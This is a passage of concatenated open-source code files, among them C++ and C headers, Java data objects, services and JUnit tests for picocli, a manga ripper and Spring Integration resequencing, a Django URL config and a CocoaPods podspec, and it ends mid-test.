peer_id_t, cluster_directory_metadata_t>>> directory_view, watchable_map_t<peer_id_t, cluster_directory_metadata_t> *directory_map_view, table_meta_client_t *table_meta_client, server_config_client_t *server_config_client, mailbox_manager_t *mailbox_manager, rdb_context_t *rdb_context, lifetime_t<name_resolver_t const &> name_resolver); private: using backend_sentry_t = map_insertion_sentry_t< artificial_reql_cluster_interface_t::table_backends_map_t::key_type, artificial_reql_cluster_interface_t::table_backends_map_t::mapped_type>; scoped_ptr_t<auth::permissions_artificial_table_backend_t> permissions_backend[2]; backend_sentry_t permissions_sentry; scoped_ptr_t<auth::users_artificial_table_backend_t> users_backend; backend_sentry_t users_sentry; scoped_ptr_t<cluster_config_artificial_table_backend_t> cluster_config_backend; backend_sentry_t cluster_config_sentry; scoped_ptr_t<db_config_artificial_table_backend_t> db_config_backend; backend_sentry_t db_config_sentry; scoped_ptr_t<issues_artificial_table_backend_t> issues_backend[2]; backend_sentry_t issues_sentry; scoped_ptr_t<logs_artificial_table_backend_t> logs_backend[2]; backend_sentry_t logs_sentry; scoped_ptr_t<server_config_artificial_table_backend_t> server_config_backend; backend_sentry_t server_config_sentry; scoped_ptr_t<server_status_artificial_table_backend_t> server_status_backend[2]; backend_sentry_t server_status_sentry; scoped_ptr_t<stats_artificial_table_backend_t> stats_backend[2]; backend_sentry_t stats_sentry; scoped_ptr_t<table_config_artificial_table_backend_t> table_config_backend[2]; backend_sentry_t table_config_sentry; scoped_ptr_t<table_status_artificial_table_backend_t> table_status_backend[2]; backend_sentry_t table_status_sentry; scoped_ptr_t<jobs_artificial_table_backend_t> jobs_backend[2]; backend_sentry_t jobs_sentry; scoped_ptr_t<in_memory_artificial_table_backend_t> debug_scratch_backend; backend_sentry_t debug_scratch_sentry; scoped_ptr_t<debug_stats_artificial_table_backend_t> debug_stats_backend; backend_sentry_t debug_stats_sentry; scoped_ptr_t<debug_table_status_artificial_table_backend_t> debug_table_status_backend; backend_sentry_t debug_table_status_sentry; }; #endif /* CLUSTERING_ADMINISTRATION_ARTIFICIAL_REQL_CLUSTER_INTERFACE_HPP_ */
6,676
6,034
<reponame>ssSlowDown/onemall package cn.iocoder.mall.payservice.dal.mysql.dataobject.transaction; import cn.iocoder.mall.mybatis.core.dataobject.DeletableDO; import com.baomidou.mybatisplus.annotation.TableName; import lombok.Data; import lombok.EqualsAndHashCode; import lombok.experimental.Accessors; /** * 交易扩展表 */ @TableName("pay_transaction_extension") @Data @EqualsAndHashCode(callSuper = true) @Accessors(chain = true) public class PayTransactionExtensionDO extends DeletableDO { /** * 编号,自增 */ private Integer id; /** * 交易编号 {@link PayTransactionDO#getId()} */ private Integer transactionId; /** * 选择的支付渠道 */ private Integer payChannel; /** * 生成传输给第三方的订单号 * * 唯一索引 */ private String transactionCode; /** * 扩展内容 * * 异步通知的时候填充回调的数据 */ private String extensionData; /** * 发起交易的 IP */ private String createIp; /** * 状态 * * @see cn.iocoder.mall.payservice.enums.transaction.PayTransactionStatusEnum * 注意,只包含上述枚举的 WAITING 和 SUCCESS */ private Integer status; }
623
1,006
<gh_stars>1000+ /**************************************************************************** * arch/risc-v/src/fe310/hardware/fe310_prci.h * * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. The * ASF licenses this file to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the * License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations * under the License. * ****************************************************************************/ #ifndef __ARCH_RISCV_SRC_FE310_HARDWARE_FE310_PRCI_H #define __ARCH_RISCV_SRC_FE310_HARDWARE_FE310_PRCI_H /**************************************************************************** * Pre-processor Definitions ****************************************************************************/ #define FE310_HFROSCCFG (FE310_PRCI_BASE + 0x00) #define FE310_HFXOSCCFG (FE310_PRCI_BASE + 0x04) #define FE310_PLLCFG (FE310_PRCI_BASE + 0x08) #define FE310_PLLOUTDIV (FE310_PRCI_BASE + 0x0c) #define HFXOSCCFG_HFXOSCEN (0x1 << 30) #define HFXOSCCFG_HFXOSCRDY (0x1 << 31) #define PLLCFG_PLLSEL (0x1 << 16) #define PLLCFG_PLLREFSEL (0x1 << 17) #define PLLCFG_PLLBYPASS (0x1 << 18) #define PLLCFG_PLLLOCK (0x1 << 31) #endif /* __ARCH_RISCV_SRC_FE310_HARDWARE_FE310_PRCI_H */
580
3,589
package picocli.annotation.processing.tests; import com.google.testing.compile.Compilation; import com.google.testing.compile.JavaFileObjects; import org.junit.Ignore; import org.junit.Test; import picocli.codegen.aot.graalvm.processor.NativeImageConfigGeneratorProcessor; import javax.annotation.processing.Processor; import javax.tools.StandardLocation; import static com.google.testing.compile.CompilationSubject.assertThat; import static com.google.testing.compile.Compiler.javac; import static picocli.annotation.processing.tests.Resources.slurp; import static picocli.annotation.processing.tests.YamlAssert.compareCommandYamlDump; import static picocli.codegen.aot.graalvm.processor.NativeImageConfigGeneratorProcessor.OPTION_PROJECT; public class Issue1151Test { @Test public void testIssue1151() { Processor processor = new AnnotatedCommandSourceGeneratorProcessor(); Compilation compilation = javac() .withProcessors(processor) .compile(JavaFileObjects.forResource( "picocli/issue1151/Issue1151CommandWithManPageGeneratorSubcommand.java")); assertThat(compilation).succeeded(); } @Test public void testGenerateReflectConfigIssue1151() { NativeImageConfigGeneratorProcessor processor = new NativeImageConfigGeneratorProcessor(); Compilation compilation = javac() .withProcessors(processor) .withOptions("-A" + OPTION_PROJECT + "=issue1151") .compile(JavaFileObjects.forSourceLines( "picocli.issue1151.Issue1151CommandWithManPageGeneratorSubcommand", slurp("/picocli/issue1151/Issue1151CommandWithManPageGeneratorSubcommand.java"))//, ); assertThat(compilation).succeeded(); assertThat(compilation) .generatedFile(StandardLocation.CLASS_OUTPUT, "META-INF/native-image/picocli-generated/issue1151/reflect-config.json") .contentsAsUtf8String().isEqualTo(slurp("/picocli/issue1151/issue1151-reflect-config.json")); assertThat(compilation).hadWarningCount(0); // #826 version warnings are now suppressed } }
975
394
from django.conf.urls import include,url from django.contrib import admin from names.views import index,login_view,logout from django.conf.urls import handler404, handler500 from asset.views import AssetUpload from django.conf import settings from django.urls import path import xadmin xadmin.autodiscover() from xadmin.plugins import xversion xversion.register_models() urlpatterns = [ path('admin/', xadmin.site.urls, name="xadmin"), path('dadmin/', admin.site.urls,name="dadmin"), path('', index), path('login.html', login_view,name="login_view"), path('logout.html', logout,name="logout"), path('index.html', index), path('asset/', include('asset.urls', namespace="asset", ), ), path('db/', include('db.urls', namespace="db", ), ), path('tasks/', include('tasks.urls', namespace="tasks",), ), path('names/', include('names.urls', namespace="names",), ), path('library/', include('library.urls', namespace="library",), ), path('upload/', AssetUpload.as_view()), path('ueditor/',include('DjangoUeditor.urls' )), path('release/', include('release.urls', namespace="release")), ] if settings.DEBUG: from django.conf.urls.static import static urlpatterns += static( settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
505
3,151
package com.rarchives.ripme.tst.ripper.rippers; import java.io.IOException; import java.net.URL; import com.rarchives.ripme.ripper.rippers.ManganeloRipper; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Disabled; import org.junit.jupiter.api.Test; public class ManganeloRipperTest extends RippersTest { @Test @Disabled("no images found, test or ripper broken") public void testRip() throws IOException { ManganeloRipper ripper = new ManganeloRipper(new URL("https://manganelo.com/manga/demonic_housekeeper")); testRipper(ripper); } @Test public void testGetGID() throws IOException { URL url = new URL("https://manganelo.com/manga/demonic_housekeeper"); ManganeloRipper ripper = new ManganeloRipper(url); Assertions.assertEquals("demonic_housekeeper", ripper.getGID(url)); } }
337
542
<filename>manager/manager-core/src/main/java/cn/vbill/middleware/porter/manager/service/impl/NodesOwnerServiceImpl.java /* * Copyright ©2018 vbill.cn. * <p> * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * </p> */ package cn.vbill.middleware.porter.manager.service.impl; import cn.vbill.middleware.porter.manager.core.dto.ControlPageVo; import cn.vbill.middleware.porter.manager.core.dto.ControlSettingVo; import cn.vbill.middleware.porter.manager.core.dto.OwnerVo; import cn.vbill.middleware.porter.manager.core.entity.CUser; import cn.vbill.middleware.porter.manager.core.entity.DicControlTypePlugin; import cn.vbill.middleware.porter.manager.core.entity.NodesOwner; import cn.vbill.middleware.porter.manager.core.mapper.NodesOwnerMapper; import cn.vbill.middleware.porter.manager.service.CUserService; import cn.vbill.middleware.porter.manager.service.DicControlTypePluginService; import cn.vbill.middleware.porter.manager.service.DictService; import cn.vbill.middleware.porter.manager.service.NodesOwnerService; import cn.vbill.middleware.porter.manager.web.rcc.RoleCheckContext; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Service; import java.util.ArrayList; import java.util.List; import java.util.Map; /** * 节点所有权控制表 服务实现类 * * @author: FairyHood * @date: 2019-03-20 16:29:06 * @version: V1.0-auto * @review: FairyHood/2019-03-20 16:29:06 */ @Service public class NodesOwnerServiceImpl implements NodesOwnerService { private static final Logger LOGGER = LoggerFactory.getLogger(NodesOwnerServiceImpl.class); @Autowired private NodesOwnerMapper nodesOwnerMapper; @Autowired private CUserService cUserService; @Autowired private DictService dictService; @Autowired protected DicControlTypePluginService dicControlTypePluginService; @Override public ControlPageVo findOwnerByNodeId(String nodeId) { // ownerType=1:节点所有者 shareType=2:节点共享者 OwnerVo owner = checkOwner(cUserService.selectOwnersByNodeId(nodeId, 1)); List<OwnerVo> shareOwner = checkShares(cUserService.selectOwnersByNodeId(nodeId, 2)); // 组装ControlPageVo并返回 ControlPageVo controlPageVo = new ControlPageVo(owner, shareOwner, null, null); return controlPageVo; } @Override public ControlPageVo makeControlPage(String nodeId) { // ownerType=1:节点所有者 shareType=2:节点共享者 OwnerVo owner = checkOwner(cUserService.selectOwnersByNodeId(nodeId, 1)); List<OwnerVo> shareOwner = checkShares(cUserService.selectOwnersByNodeId(nodeId, 2)); // 操作类型枚举 Map<String, Object> dictControlType = dictService.dictControlType(); // 查询当前登录人type Boolean isManager = checkLoginRole(); Integer type = isManager ? 0 : nodesOwnerMapper.findOwnerTypeByNodeIdAndUserId(nodeId, RoleCheckContext.getUserIdHolder().getUserId()); // 根据Type查出操作按钮字典 List<DicControlTypePlugin> dicControlTypePlugins = dicControlTypePluginService.findByType(type); // 组装ControlPageVo并返回 ControlPageVo controlPageVo = new ControlPageVo(owner, shareOwner, dictControlType, dicControlTypePlugins); return controlPageVo; } @Override public Integer nodeOwnerSetting(ControlSettingVo controlSettingVo) { String controlType = null; if (null != controlSettingVo.getControlTypeEnum()) { controlType = controlSettingVo.getControlTypeEnum().getCode(); } switch (controlType) { // 移交 case "CHANGE": Integer changeNum = nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 1, null); if (!controlSettingVo.getToUserIds().isEmpty()) { // 查询预移交者是否为该任务的共享者 Integer type = nodesOwnerMapper.findOwnerTypeByNodeIdAndUserId(controlSettingVo.getNodeId(), controlSettingVo.getToUserIds().get(0)); if (type != null && type == 2) { // 提升权限 nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 2, controlSettingVo.getToUserIds().get(0)); } nodesOwnerMapper.batchInsert(controlSettingVo.getToUserIds(), controlSettingVo.getNodeId(), 1); } LOGGER.info("移交节点[{}],操作者用户ID:[{}],授权者用户ID:[{}]", controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId(), controlSettingVo.getToUserIds().get(0)); return changeNum; // 共享 case "SHARE": Integer shareNum = nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 2, null); if (!controlSettingVo.getToUserIds().isEmpty()) { nodesOwnerMapper.batchInsert(controlSettingVo.getToUserIds(), controlSettingVo.getNodeId(), 2); } LOGGER.info("共享节点[{}],操作者用户ID:[{}],授权者用户ID:[{}]", controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId(), controlSettingVo.getToUserIds()); return shareNum; // 作废 case "CANCEL": Integer type = nodesOwnerMapper.findOwnerTypeByNodeIdAndUserId(controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId()); LOGGER.info("放弃节点[{}],操作者用户ID:[{}]", controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId()); return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), type, RoleCheckContext.getUserIdHolder().getUserId()); // 回收所有者 case "RECYCLE_C": LOGGER.info("回收节点所有者,节点id[{}],操作者管理员ID:[{}]", controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId()); return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 1, null); // 回收共享者 case "RECYCLE_S": LOGGER.info("回收节点所有者,节点id[{}],操作者管理员ID:[{}]", controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId()); return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 2, null); // 回收所有权限 case "RECYCLE_A": LOGGER.info("回收节点权限,节点id[{}],操作者管理员ID:[{}]", controlSettingVo.getNodeId(), RoleCheckContext.getUserIdHolder().getUserId()); return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), null, null); default: LOGGER.error("ControlType为null!!"); return null; } } /** * 组装任务所有者 * * @author MurasakiSeiFu * @date 2019-05-07 13:55 * @param: [userOwner] * @return: cn.vbill.middleware.porter.manager.core.dto.OwnerVo */ private OwnerVo checkOwner(List<CUser> userOwner) { return userOwner.isEmpty() ? null : new OwnerVo(userOwner.get(0), 1); } /** * 组装任务共享者 * * @author MurasakiSeiFu * @date 2019-05-07 13:59 * @param: [userShares] * @return: java.util.List<cn.vbill.middleware.porter.manager.core.dto.OwnerVo> */ private List<OwnerVo> checkShares(List<CUser> userShares) { if (userShares.isEmpty()) { return null; } List<OwnerVo> shareOnwer = new ArrayList<>(); for (CUser userShare : userShares) { OwnerVo owner = new OwnerVo(userShare, 2); shareOnwer.add(owner); } return shareOnwer; } /** * 判断当前登录用户是否为管理员 * * @author MurasakiSeiFu * @date 2019-04-04 13:48 * @param: [] * @return: java.lang.Boolean */ private Boolean checkLoginRole() { String roleCode = RoleCheckContext.getUserIdHolder().getRoleCode(); return ("A0001".equals(roleCode) || "A0002".equals(roleCode)); } @Override public void insertByNodes(String nodeId) { NodesOwner nodesOwner = new NodesOwner(); nodesOwner.setNodeId(nodeId); nodesOwner.setOwnerId(RoleCheckContext.getUserIdHolder().getUserId()); nodesOwnerMapper.insert(nodesOwner); } }
4,020
5,169
<filename>Specs/9/c/1/WRService/0.1.0/WRService.podspec.json { "name": "WRService", "version": "0.1.0", "summary": "WRService is light and convinient tool for working with an API via NSURLSession for most of applications.", "description": "# WRService\n\nWRService is light and convinient tool for working with an API via NSURLSession for most of applications.\n\nStandart configuration has 2 queues: default and background. Background queue has less priority than standart queue. Each quque is represented as an NSURLSession instance. \n\nYou get internet data throuth WROperations. There is an example:\n\n NSURL *url = [NSURL URLWithString:@\"http://speedtest.ftp.otenet.gr/files/test100Mb.db\"];\n \n WROperation *op = [[WROperation alloc] initWithUrl:url];\n \n [[WRService shared] execute:op onSuccess:^(WROperation * _Nonnull op, NSData * _Nonnull data) {\n NSLog(@\"Backgound task is READY! %@\", op);\n } onFail:^(WROperation * _Nonnull op, NSError * _Nonnull error) {\n NSLog(@\"Fail error: %@\", error);\n }];\n\n\n\nYou can get progress via block or delegate. Example:\n\n op.progressCallback = ^(float progress) {\n NSLog(@\"Progress: %f\", progress);\n };\n \n\nIf you emplemented WRObjectOperationProtocol to your class you can get result as your class instance or array of your class instanse. Example:\n\n NSURL *url = [NSURL URLWithString:@\"http://ip.jsontest.com\"];\n NSURLRequest *req = [NSURLRequest requestWithURL:url];\n \n WRObjectOperation * objOp = [[WRObjectOperation alloc] initWithRequest:req resultClass:[Article class]];\n \n [[WRService shared] execute:objOp onSuccess:^(WROperation * _Nonnull op, Article _Nonnull result) {\n NSLog(@\"Article: %@\", result);\n } onFail:^(WROperation * _Nonnull op, NSError * _Nonnull error) {\n NSLog(@\"Error: %@\", error);\n }];\n\nWROperation.\n------------\n\nEach WROperation has priority property. There are three types of priority: \nWROperationPriorityDefault, WROperationPriorityBackground, WROperationPriorityExclusive.\n\nIf you start an operation with Exclusive priority all task (except Exclusive) will be suspended. \nSuspended tasks will continue work after all exclusive tasks is finished.\n\n\nJSON encoding and decoding.\n--------------------------\nAnd if you want have the fastest way for creating class which will be decoded from JSON use NSObject_WRJSON category for generating Objective-C class from JSON object. Example:\n\n NSURL *url = [NSURL URLWithString:@\"https://api.github.com/events\"];\n NSURLRequest *req = [NSURLRequest requestWithURL:url];\n \n WRObjectOperation *op = [[WRObjectOperation alloc] initWithRequest:req];\n \n [[WRService shared] execute:op onSuccess:^(WROperation * _Nonnull op, NSData* _Nonnull result) {\n \n id json = [NSJSONSerialization JSONObjectWithData:result options:0 error:nil];\n if (json) {\n NSString *classInterface = [NSObject wrGenerateClass:@\"GitHubEvent\" fromJSON:json];\n NSLog(@\"%@\", classInterface);\n }\n } onFail:nil];\n \n \n /* Result of NSLog: */\n\n@class Repo, Actor, Payload;@interface GitHubEvent : NSObject\n\n@property (nonatomic, strong) Repo *repo;@property (nonatomic, strong) Actor *actor;@property (nonatomic, assign) short public;@property (nonatomic, assign) NSInteger id;@property (nonatomic, copy) NSString *created_at;@property (nonatomic, strong) Payload *payload;@property (nonatomic, copy) NSString *type;@end\n\n\n@interface Repo : NSObject\n\n@property (nonatomic, assign) NSInteger id;@property (nonatomic, copy) NSString *name;@property (nonatomic, copy) NSString *url;@end\n\n\n@interface Actor : NSObject\n\n@property (nonatomic, copy) NSString *display_login;@property (nonatomic, assign) NSInteger id;@property (nonatomic, copy) NSString *login;@property (nonatomic, copy) NSString *avatar_url;@property (nonatomic, copy) NSString *url;@property (nonatomic, copy) NSString *gravatar_id;@end\n\n@interface Payload : NSObject\n\n@property (nonatomic, copy) NSString *before;@property (nonatomic, copy) NSString *ref;@property (nonatomic, assign) NSInteger push_id;@property (nonatomic, assign) NSInteger size;@property (nonatomic, assign) NSInteger distinct_size;@property (nonatomic, copy) NSString *head;@end", "homepage": "https://github.com/beastgrim/WRService", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "beastgrim": "<EMAIL>" }, "source": { "git": "https://github.com/beastgrim/WRService.git", "branch": "0.1.0", "tag": "0.1.0" }, "platforms": { "ios": "8.0", "osx": "10.8", "tvos": "9.0" }, "source_files": "WRService/Classes/**/*" }
1,717
1,093
/* * Copyright 2002-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.integration.aggregator; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.fail; import static org.mockito.Mockito.mock; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import org.springframework.beans.factory.BeanFactory; import org.springframework.expression.spel.standard.SpelExpressionParser; import org.springframework.integration.IntegrationMessageHeaderAccessor; import org.springframework.integration.channel.QueueChannel; import org.springframework.integration.store.MessageGroupStore; import org.springframework.integration.store.SimpleMessageStore; import org.springframework.integration.support.MessageBuilder; import org.springframework.messaging.Message; import org.springframework.messaging.MessageChannel; import org.springframework.messaging.MessagingException; import org.springframework.scheduling.concurrent.ThreadPoolTaskScheduler; /** * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> */ public class ResequencerTests { private ResequencingMessageHandler resequencer; private final ResequencingMessageGroupProcessor processor = new ResequencingMessageGroupProcessor(); private final MessageGroupStore store = new SimpleMessageStore(); @BeforeEach public void configureResequencer() { this.resequencer = new ResequencingMessageHandler(processor, store, null, null); this.resequencer.setBeanFactory(mock(BeanFactory.class)); this.resequencer.afterPropertiesSet(); } @Test public void testBasicResequencing() { QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 3, 3, replyChannel); Message<?> message2 = createMessage("456", "ABC", 3, 1, replyChannel); Message<?> message3 = createMessage("789", "ABC", 3, 2, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message3); this.resequencer.handleMessage(message2); Message<?> reply1 = replyChannel.receive(0); Message<?> reply2 = replyChannel.receive(0); Message<?> reply3 = replyChannel.receive(0); assertThat(reply1).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1); assertThat(reply2).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2); assertThat(reply3).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3); } @Test public void testBasicResequencingA() { SequenceSizeReleaseStrategy releaseStrategy = new SequenceSizeReleaseStrategy(); releaseStrategy.setReleasePartialSequences(true); this.resequencer = new ResequencingMessageHandler(processor, store, null, releaseStrategy); this.resequencer.setBeanFactory(mock(BeanFactory.class)); this.resequencer.afterPropertiesSet(); QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 3, 1, replyChannel); Message<?> message3 = createMessage("789", "ABC", 3, 3, replyChannel); this.resequencer.handleMessage(message3); assertThat(replyChannel.receive(0)).isNull(); this.resequencer.handleMessage(message1); assertThat(replyChannel.receive(0)).isNotNull(); assertThat(replyChannel.receive(0)).isNull(); } @Test public void testBasicUnboundedResequencing() { SequenceSizeReleaseStrategy releaseStrategy = new SequenceSizeReleaseStrategy(); releaseStrategy.setReleasePartialSequences(true); this.resequencer = new ResequencingMessageHandler(processor, store, null, releaseStrategy); QueueChannel replyChannel = new QueueChannel(); this.resequencer.setCorrelationStrategy(message -> "A"); this.resequencer.setBeanFactory(mock(BeanFactory.class)); this.resequencer.afterPropertiesSet(); //Message<?> message0 = MessageBuilder.withPayload("0").setSequenceNumber(0).build(); Message<?> message1 = MessageBuilder.withPayload("1").setSequenceNumber(1).setReplyChannel(replyChannel).build(); Message<?> message2 = MessageBuilder.withPayload("2").setSequenceNumber(2).setReplyChannel(replyChannel).build(); Message<?> message3 = MessageBuilder.withPayload("3").setSequenceNumber(3).setReplyChannel(replyChannel).build(); Message<?> message4 = MessageBuilder.withPayload("4").setSequenceNumber(4).setReplyChannel(replyChannel).build(); Message<?> message5 = MessageBuilder.withPayload("5").setSequenceNumber(5).setReplyChannel(replyChannel).build(); this.resequencer.handleMessage(message3); assertThat(replyChannel.receive(0)).isNull(); this.resequencer.handleMessage(message1); assertThat(replyChannel.receive(0)).isNotNull(); this.resequencer.handleMessage(message2); assertThat(replyChannel.receive(0)).isNotNull(); assertThat(replyChannel.receive(0)).isNotNull(); assertThat(replyChannel.receive(0)).isNull(); this.resequencer.handleMessage(message5); assertThat(replyChannel.receive(0)).isNull(); this.resequencer.handleMessage(message4); assertThat(replyChannel.receive(0)).isNotNull(); } @Test public void testResequencingWithDuplicateMessages() { QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 3, 3, replyChannel); Message<?> message2 = createMessage("456", "ABC", 3, 1, replyChannel); Message<?> message3 = createMessage("789", "ABC", 3, 2, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message3); this.resequencer.handleMessage(message3); this.resequencer.handleMessage(message2); Message<?> reply1 = replyChannel.receive(0); Message<?> reply2 = replyChannel.receive(0); Message<?> reply3 = replyChannel.receive(0); assertThat(reply1).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1); assertThat(reply2).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2); assertThat(reply3).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3); } @Test public void testResequencingWithIncompleteSequenceRelease() { this.resequencer.setReleaseStrategy(new SequenceSizeReleaseStrategy(true)); // INT-3846 this.resequencer.setMessageStore(new SimpleMessageStore(3)); QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 4, 4, replyChannel); Message<?> message2 = createMessage("456", "ABC", 4, 2, replyChannel); Message<?> message3 = createMessage("789", "ABC", 4, 1, replyChannel); // release 2 after this one Message<?> message4 = createMessage("XYZ", "ABC", 4, 3, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message2); this.resequencer.handleMessage(message3); Message<?> reply1 = replyChannel.receive(0); Message<?> reply2 = replyChannel.receive(0); Message<?> reply3 = replyChannel.receive(0); // only messages 1 and 2 should have been received by now assertThat(reply1).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1); assertThat(reply2).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2); assertThat(reply3).isNull(); // when sending the last message, the whole sequence must have been sent this.resequencer.handleMessage(message4); reply3 = replyChannel.receive(0); Message<?> reply4 = replyChannel.receive(0); assertThat(reply3).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3); assertThat(reply4).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply4).getSequenceNumber()).isEqualTo(4); } @Test public void testResequencingWithCapacity() { this.resequencer.setReleaseStrategy(new SequenceSizeReleaseStrategy(true)); // INT-3846 this.resequencer.setMessageStore(new SimpleMessageStore(3, 2)); QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 4, 4, replyChannel); Message<?> message2 = createMessage("456", "ABC", 4, 2, replyChannel); Message<?> message3 = createMessage("789", "ABC", 4, 1, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message2); try { this.resequencer.handleMessage(message3); fail("Expected exception"); } catch (MessagingException e) { assertThat(e.getMessage()).contains("out of capacity (2) for group 'ABC'"); } } @Test public void testResequencingWithPartialSequenceAndComparator() { this.resequencer.setReleaseStrategy(new SequenceSizeReleaseStrategy(true)); QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("456", "ABC", 4, 2, replyChannel); Message<?> message2 = createMessage("123", "ABC", 4, 1, replyChannel); Message<?> message3 = createMessage("XYZ", "ABC", 4, 4, replyChannel); Message<?> message4 = createMessage("789", "ABC", 4, 3, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message2); this.resequencer.handleMessage(message3); Message<?> reply1 = replyChannel.receive(0); Message<?> reply2 = replyChannel.receive(0); Message<?> reply3 = replyChannel.receive(0); // only messages 1 and 2 should have been received by now assertThat(reply1).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1); assertThat(reply2).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2); assertThat(reply3).isNull(); // when sending the last message, the whole sequence must have been sent this.resequencer.handleMessage(message4); reply3 = replyChannel.receive(0); Message<?> reply4 = replyChannel.receive(0); assertThat(reply3).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3); assertThat(reply4).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply4).getSequenceNumber()).isEqualTo(4); } @Test public void testResequencingWithDiscard() { QueueChannel discardChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 4, 2, null); Message<?> message2 = createMessage("456", "ABC", 4, 1, null); Message<?> message3 = createMessage("789", "ABC", 4, 4, null); this.resequencer.setSendPartialResultOnExpiry(false); this.resequencer.setDiscardChannel(discardChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message2); assertThat(store.expireMessageGroups(-10000)).isEqualTo(1); Message<?> reply1 = discardChannel.receive(0); Message<?> reply2 = discardChannel.receive(0); Message<?> reply3 = discardChannel.receive(0); // only messages 1 and 2 should have been received by now assertThat(reply1).isNotNull(); assertThat(reply2).isNotNull(); assertThat(reply3).isNull(); ArrayList<Integer> sequence = new ArrayList<>( Arrays.asList(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber(), new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber())); Collections.sort(sequence); assertThat(sequence.toString()).isEqualTo("[1, 2]"); // Once a group is expired, late messages are discarded immediately by default this.resequencer.handleMessage(message3); reply3 = discardChannel.receive(0); assertThat(reply3).isNotNull(); } @Test public void testResequencingWithDifferentSequenceSizes() { QueueChannel discardChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 4, 2, null); Message<?> message2 = createMessage("456", "ABC", 5, 1, null); this.resequencer.setSendPartialResultOnExpiry(false); this.resequencer.setDiscardChannel(discardChannel); this.resequencer.setReleasePartialSequences(true); // force SequenceSizeReleaseStrategy this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message2); // this.resequencer.discardBarrier(this.resequencer.barriers.get("ABC")); Message<?> discard1 = discardChannel.receive(0); Message<?> discard2 = discardChannel.receive(0); // message2 has been discarded because it came in with the wrong sequence size assertThat(discard1).isNotNull(); assertThat(new 